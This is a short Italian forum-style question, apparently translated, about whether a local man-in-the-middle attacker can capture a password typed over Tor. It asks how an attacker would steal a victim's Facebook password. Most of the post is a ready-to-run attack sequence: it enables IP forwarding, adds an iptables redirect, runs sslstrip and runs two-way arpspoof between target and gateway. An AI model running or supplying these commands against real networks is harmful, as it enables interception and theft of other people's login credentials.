Devo temere un aggressore locale man-in-the-middle mentre inserisco la password con tor?
Dire che una vittima si sta connettendo a Facebook con il browser.
In che modo un utente malintenzionato può creare un attacco man-in-the-middle che ottiene la sua password? (quali comandi precisi)
Se non viene utilizzato alcun proxy, l'autore dell'attacco utilizzerà
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 54321
sslstrip -l 54321
arpspoof -i eth0 -t < targetIP > < gatewayIP >
arpspoof -i eth0 -t < gatewayIP > < targetIP>